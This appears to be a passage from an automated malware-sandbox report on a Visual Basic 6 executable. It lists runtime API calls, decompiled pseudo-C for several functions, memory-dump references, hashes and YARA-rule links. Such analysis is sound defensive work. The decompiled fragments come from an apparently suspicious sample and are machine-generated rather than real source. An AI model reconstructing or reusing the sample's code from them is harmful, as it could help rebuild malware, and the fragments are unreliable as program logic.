        0x00000000

        APIs
        • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0041392B
        • #674.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 0041397D
        • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 00413982
        • __vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A,?,?,?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 004139B2
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 004139D9
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413A06
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034FC,00000150), ref: 00413A3B
        • #532.MSVBVM60(?), ref: 00413A4C
        • __vbaFreeStr.MSVBVM60(?), ref: 00413A54
        • __vbaFreeObj.MSVBVM60(?), ref: 00413A5C
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$Free$#532#674CheckChkstkHresultListNew2
        • String ID:
        • API String ID: 4254045594-0
        • Opcode ID: ac16ffa732300a74b2cdbd43d29d807b3e4b64806745960122590399537feef9
        • Instruction ID: e0b70f901782b24fee4b2b9779088f2843b4f83af62172b37935bedcb7e2d48a
        • Opcode Fuzzy Hash: ac16ffa732300a74b2cdbd43d29d807b3e4b64806745960122590399537feef9
        • Instruction Fuzzy Hash: AB4108B0950208EFDB01EFD1C88ABEEBBB8AF04705F10456AE041BA2A1D7B95945CB59
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00413CCF, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83COMMON
        Download Yara Rule
        C-Code - Quality: 62%
        			E00413CCF(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v32;
				signed int _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _t53;
				signed int _t58;
				signed int _t59;
				void* _t67;
				void* _t69;
				intOrPtr _t70;

				_t70 = _t69 - 0xc;
				 *[fs:0x0] = _t70;
				L004012A0();
				_v16 = _t70;
				_v12 = 0x401248;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x38,  *[fs:0x0], 0x4012a6, _t67);
				if( *0x41565c != 0) {
					_v72 = 0x41565c;
				} else {
					_push(0x41565c);
					_push(0x4036a4);
					L00401408();
					_v72 = 0x41565c;
				}
				_t9 =  &_v72; // 0x41565c
				_v44 =  *((intOrPtr*)( *_t9));
				_t53 =  *((intOrPtr*)( *_v44 + 0x14))(_v44,  &_v40);
				asm("fclex");
				_v48 = _t53;
				if(_v48 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x403694);
					_push(_v44);
					_push(_v48);
					L00401402();
					_v76 = _t53;
				}
				_v52 = _v40;
				_t58 =  *((intOrPtr*)( *_v52 + 0x60))(_v52,  &_v36);
				asm("fclex");
				_v56 = _t58;
				if(_v56 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x4036b4);
					_push(_v52);
					_push(_v56);
					L00401402();
					_v80 = _t58;
				}
				_t59 = _v36;
				_v68 = _t59;
				_v36 = _v36 & 0x00000000;
				L004013EA();
				L004013DE();
				asm("wait");
				_push(0x413dee);
				L004013E4();
				return _t59;
			}























        0x00413cd2
        0x00413ce1
        0x00413ceb
        0x00413cf3
        0x00413cf6
        0x00413cfd
        0x00413d0c
        0x00413d16
        0x00413d30
        0x00413d18
        0x00413d18
        0x00413d1d
        0x00413d22
        0x00413d27
        0x00413d27
        0x00413d37
        0x00413d3c
        0x00413d4b
        0x00413d4e
        0x00413d50
        0x00413d57
        0x00413d70
        0x00413d59
        0x00413d59
        0x00413d5b
        0x00413d60
        0x00413d63
        0x00413d66
        0x00413d6b
        0x00413d6b
        0x00413d77
        0x00413d86
        0x00413d89
        0x00413d8b
        0x00413d92
        0x00413dab
        0x00413d94
        0x00413d94
        0x00413d96
        0x00413d9b
        0x00413d9e
        0x00413da1
        0x00413da6
        0x00413da6
        0x00413daf
        0x00413db2
        0x00413db5
        0x00413dbf
        0x00413dc7
        0x00413dcc
        0x00413dcd
        0x00413de8
        0x00413ded

        APIs
        • __vbaChkstk.MSVBVM60(?,004012A6), ref: 00413CEB
        • __vbaNew2.MSVBVM60(004036A4,0041565C,?,?,?,?,004012A6), ref: 00413D22
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403694,00000014), ref: 00413D66
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004036B4,00000060), ref: 00413DA1
        • __vbaStrMove.MSVBVM60 ref: 00413DBF
        • __vbaFreeObj.MSVBVM60 ref: 00413DC7
        • __vbaFreeStr.MSVBVM60(00413DEE), ref: 00413DE8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$CheckFreeHresult$ChkstkMoveNew2
        • String ID: \VA
        • API String ID: 1253681662-2011006226
        • Opcode ID: 8a5ce53adb78c3a4869c3f8619a20b7df8fac2868dccf75eddcece5c121bcb55
        • Instruction ID: 880a53564ca7318f0dc96e28ab7f5b26585ab9af44540d47b9f2e593e9740ed7
        • Opcode Fuzzy Hash: 8a5ce53adb78c3a4869c3f8619a20b7df8fac2868dccf75eddcece5c121bcb55
        • Instruction Fuzzy Hash: D9310270D00208EFDB01DF95D985BDDBBB4BF1830AF60806AF001B72A0C7799A858F68
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00413BAC, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63COMMON
        Download Yara Rule
        C-Code - Quality: 48%
        			E00413BAC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v48;
				char _v56;
				char _v64;
				char _v80;
				char* _v104;
				intOrPtr _v112;
				intOrPtr _v136;
				char _v144;
				short _v148;
				short _t34;
				short _t38;
				void* _t44;
				void* _t46;
				intOrPtr _t47;

				_t47 = _t46 - 0xc;
				 *[fs:0x0] = _t47;
				L004012A0();
				_v16 = _t47;
				_v12 = 0x401238;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t44);
				_v56 = 2;
				_v64 = 2;
				_v104 = L"FGFG";
				_v112 = 8;
				L00401420();
				_push( &_v64);
				_push(1);
				_push( &_v48);
				_push( &_v80);
				L0040135A();
				_v136 = 0x403664;
				_v144 = 0x8008;
				_push( &_v80);
				_t34 =  &_v144;
				_push(_t34);
				L0040138A();
				_v148 = _t34;
				_push( &_v80);
				_push( &_v64);
				_push( &_v48);
				_push(3);
				L0040141A();
				_t38 = _v148;
				if(_t38 != 0) {
					_push(L"liquefying");
					_push(0x63);
					_push(0xffffffff);
					_push(0x20);
					L00401354();
				}
				asm("wait");
				_push(0x413ca8);
				return _t38;
			}




















        0x00413baf
        0x00413bbe
        0x00413bca
        0x00413bd2
        0x00413bd5
        0x00413bdc
        0x00413beb
        0x00413bee
        0x00413bf5
        0x00413bfc
        0x00413c03
        0x00413c10
        0x00413c18
        0x00413c19
        0x00413c1e
        0x00413c22
        0x00413c23
        0x00413c28
        0x00413c32
        0x00413c3f
        0x00413c40
        0x00413c46
        0x00413c47
        0x00413c4c
        0x00413c56
        0x00413c5a
        0x00413c5e
        0x00413c5f
        0x00413c61
        0x00413c69
        0x00413c72
        0x00413c74
        0x00413c79
        0x00413c7b
        0x00413c7d
        0x00413c7f
        0x00413c7f
        0x00413c84
        0x00413c85
        0x00000000

        APIs
        • __vbaChkstk.MSVBVM60(?,004012A6), ref: 00413BCA
        • __vbaVarDup.MSVBVM60 ref: 00413C10
        • #629.MSVBVM60(?,?,00000001,00000002), ref: 00413C23
        • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,?,?,00000001,00000002), ref: 00413C47
        • __vbaFreeVarList.MSVBVM60(00000003,?,00000002,?,00008008,?,?,?,?,?,?,?,00000001,00000002), ref: 00413C61
        • __vbaFileOpen.MSVBVM60(00000020,000000FF,00000063,liquefying,?,?,?,004012A6), ref: 00413C7F
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$#629ChkstkFileFreeListOpen
        • String ID: FGFG$liquefying
        • API String ID: 1559841514-2786267625
        • Opcode ID: 224d92e6a75558e27398ae6f27b9e4a409da6dbaeb2d5725c0d76ff58d72dfda
        • Instruction ID: f78ac0cc556279a3d847b1d9db07fbb72bb4af5c3d1f841755ef533f68f3a5a2
        • Opcode Fuzzy Hash: 224d92e6a75558e27398ae6f27b9e4a409da6dbaeb2d5725c0d76ff58d72dfda
        • Instruction Fuzzy Hash: A421EAB1D00208ABDB10EF95C845FDEBBBCBB04704F40C16AF515BB291EB7896498FA5
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00413AA0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
        Download Yara Rule
        C-Code - Quality: 35%
        			E00413AA0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				char _v36;
				char _v52;
				char* _v92;
				char _v100;
				signed int _v104;
				char _v112;
				signed int _v116;
				signed int _t34;
				signed int _t37;
				intOrPtr _t45;

				_push(__ecx);
				_push(__ecx);
				_push(0x4012a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t45;
				_push(0x60);
				L004012A0();
				_v12 = _t45;
				_v8 = 0x401228;
				_v28 = 0xe;
				_v36 = 2;
				_push( &_v36);
				_push( &_v52);
				L00401360();
				_v92 = L"Out of string space";
				_v100 = 0x8008;
				_push( &_v52);
				_t34 =  &_v100;
				_push(_t34);
				L0040138A();
				_v104 = _t34;
				_push( &_v52);
				_push( &_v36);
				_push(2);
				L0040141A();
				_t37 = _v104;
				if(_t37 == 0) {
					L6:
					asm("wait");
					_push(0x413b94);
					return _t37;
				} else {
					__fp0 =  *0x401220;
					__fp0 =  *0x401220 *  *0x401218;
					asm("fnstsw ax");
					if((__al & 0x0000000d) != 0) {
						goto L1;
					}
					_v112 = __fp0;
					__fp0 = _v112;
					_v52 = _v112;
					_a4 =  *_a4;
					__eax =  *((intOrPtr*)( *_a4 + 0x84))(_a4, __ecx);
					asm("fclex");
					_v104 = __eax;
					if(_v104 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x84);
						_push(0x403330);
						_push(_a4);
						_push(_v104);
						L00401402();
						_v116 = __eax;
					}
					goto L6;
				}
				L1:
				return __imp____vbaFPException();
			}
















        0x00413aa3
        0x00413aa4
        0x00413aa5
        0x00413ab0
        0x00413ab1
        0x00413ab8
        0x00413abb
        0x00413ac3
        0x00413ac6
        0x00413acd
        0x00413ad4
        0x00413ade
        0x00413ae2
        0x00413ae3
        0x00413ae8
        0x00413aef
        0x00413af9
        0x00413afa
        0x00413afd
        0x00413afe
        0x00413b03
        0x00413b0a
        0x00413b0e
        0x00413b0f
        0x00413b11
        0x00413b19
        0x00413b1f
        0x00413b74
        0x00413b74
        0x00413b75
        0x00000000
        0x00413b21
        0x00413b21
        0x00413b27
        0x00413b2d
        0x00413b31
        0x00000000
        0x00413ba7
        0x00413b33
        0x00413b36
        0x00413b3a
        0x00413b40
        0x00413b45
        0x00413b4b
        0x00413b4d
        0x00413b54
        0x00413b70
        0x00413b56
        0x00413b56
        0x00413b5b
        0x00413b60
        0x00413b63
        0x00413b66
        0x00413b6b
        0x00413b6b
        0x00000000
        0x00413b54
        0x004012ac
        0x004012ac

        APIs
        • __vbaChkstk.MSVBVM60(?,004012A6), ref: 00413ABB
        • #652.MSVBVM60(?,?,?,?,?,?,004012A6), ref: 00413AE3
        • __vbaVarTstNe.MSVBVM60(00008008,?), ref: 00413AFE
        • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?), ref: 00413B11
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403330,00000084), ref: 00413B66
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$#652CheckChkstkFreeHresultList
        • String ID: Out of string space
        • API String ID: 690012341-1418083887
        • Opcode ID: 94171fa21502211a01c5dd0a225f04b3019e969f2c6b09b75b581f896a09a351
        • Instruction ID: 01d39f63432a2aa1599d11d0e5353929a69174dd00534734d077883736c4ba9d
        • Opcode Fuzzy Hash: 94171fa21502211a01c5dd0a225f04b3019e969f2c6b09b75b581f896a09a351
        • Instruction Fuzzy Hash: FA2105B1904318ABDB00DFD0CD4ABEEBBB8FB04705F10456AF505BB1A1D77896548B59
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004133A5, Relevance: 7.6, APIs: 5, Instructions: 61COMMON
        Download Yara Rule
        C-Code - Quality: 66%
        			E004133A5(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v48;
				signed int _v52;
				char* _t33;
				signed int _t36;
				void* _t44;
				void* _t46;
				intOrPtr _t47;

				_t47 = _t46 - 0xc;
				 *[fs:0x0] = _t47;
				L004012A0();
				_v16 = _t47;
				_v12 = 0x4011c0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x1c,  *[fs:0x0], 0x4012a6, _t44);
				if( *0x415010 != 0) {
					_v48 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v48 = 0x415010;
				}
				_t33 =  &_v28;
				L0040140E();
				_v32 = _t33;
				_t36 =  *((intOrPtr*)( *_v32 + 0x21c))(_v32, _t33,  *((intOrPtr*)( *((intOrPtr*)( *_v48)) + 0x308))( *_v48));
				asm("fclex");
				_v36 = _t36;
				if(_v36 >= 0) {
					_v52 = _v52 & 0x00000000;
				} else {
					_push(0x21c);
					_push(0x4034fc);
					_push(_v32);
					_push(_v36);
					L00401402();
					_v52 = _t36;
				}
				L004013DE();
				_push(0x41347d);
				return _t36;
			}
















        0x004133a8
        0x004133b7
        0x004133c1
        0x004133c9
        0x004133cc
        0x004133d3
        0x004133e2
        0x004133ec
        0x00413406
        0x004133ee
        0x004133ee
        0x004133f3
        0x004133f8
        0x004133fd
        0x004133fd
        0x00413421
        0x00413425
        0x0041342a
        0x00413435
        0x0041343b
        0x0041343d
        0x00413444
        0x00413460
        0x00413446
        0x00413446
        0x0041344b
        0x00413450
        0x00413453
        0x00413456
        0x0041345b
        0x0041345b
        0x00413467
        0x0041346c
        0x00000000

        APIs
        • __vbaChkstk.MSVBVM60(?,004012A6), ref: 004133C1
        • __vbaNew2.MSVBVM60(00402AA4,00415010,?,?,?,?,004012A6), ref: 004133F8
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413425
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034FC,0000021C), ref: 00413456
        • __vbaFreeObj.MSVBVM60 ref: 00413467
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$CheckChkstkFreeHresultNew2
        • String ID:
        • API String ID: 4127847336-0
        • Opcode ID: 31108583263eacf0c17d9f8c6c5b3487bf5c044d421ff265cdb54d0d5f545581
        • Instruction ID: dc76b7ac7968d5f382e2b53922566bc0e527d13cb20cfffc0e0fc4888927fb8d
        • Opcode Fuzzy Hash: 31108583263eacf0c17d9f8c6c5b3487bf5c044d421ff265cdb54d0d5f545581
        • Instruction Fuzzy Hash: 4E21F574E50208EFCB01EFA5C849BDEBBB4BB08705F50846AF501BB2A1C77C95419F99
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004102F6, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
        Download Yara Rule
        C-Code - Quality: 82%
        			E004102F6(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				char _v64;
				char* _t16;
				void* _t23;
				void* _t25;
				intOrPtr _t26;

				_t26 = _t25 - 0xc;
				 *[fs:0x0] = _t26;
				L004012A0();
				_v16 = _t26;
				_v12 = 0x4011a0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x30,  *[fs:0x0], 0x4012a6, _t23);
				_t16 =  &_v64;
				_push(_t16);
				L004013BA();
				L004013CC();
				_push(0x410363);
				L004013F0();
				return _t16;
			}












        0x004102f9
        0x00410308
        0x00410312
        0x0041031a
        0x0041031d
        0x00410324
        0x00410333
        0x00410336
        0x00410339
        0x0041033a
        0x00410345
        0x0041034a
        0x0041035d
        0x00410362

        APIs
        • __vbaChkstk.MSVBVM60(?,004012A6), ref: 00410312
        • #546.MSVBVM60(?,?,?,?,?,004012A6), ref: 0041033A
        • __vbaVarMove.MSVBVM60(?,?,?,?,?,004012A6), ref: 00410345
        • __vbaFreeVar.MSVBVM60(00410363,?,?,?,?,?,004012A6), ref: 0041035D
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$#546ChkstkFreeMove
        • String ID:
        • API String ID: 3298562087-0
        • Opcode ID: 1ba60478f45663e2504aed2c2416de97947fda45066c3229b1731900d52423c0
        • Instruction ID: e5975bec022f277c71fcd0b9dc6dfd31bd640ce0c7b3b77f86eea9bece710552
        • Opcode Fuzzy Hash: 1ba60478f45663e2504aed2c2416de97947fda45066c3229b1731900d52423c0
        • Instruction Fuzzy Hash: 18F01D75900208ABDB04EF95C986F8DBBB8FB04744F50806AF804B75A1D77C9A458B59
        Uniqueness

        Uniqueness Score: -1.00%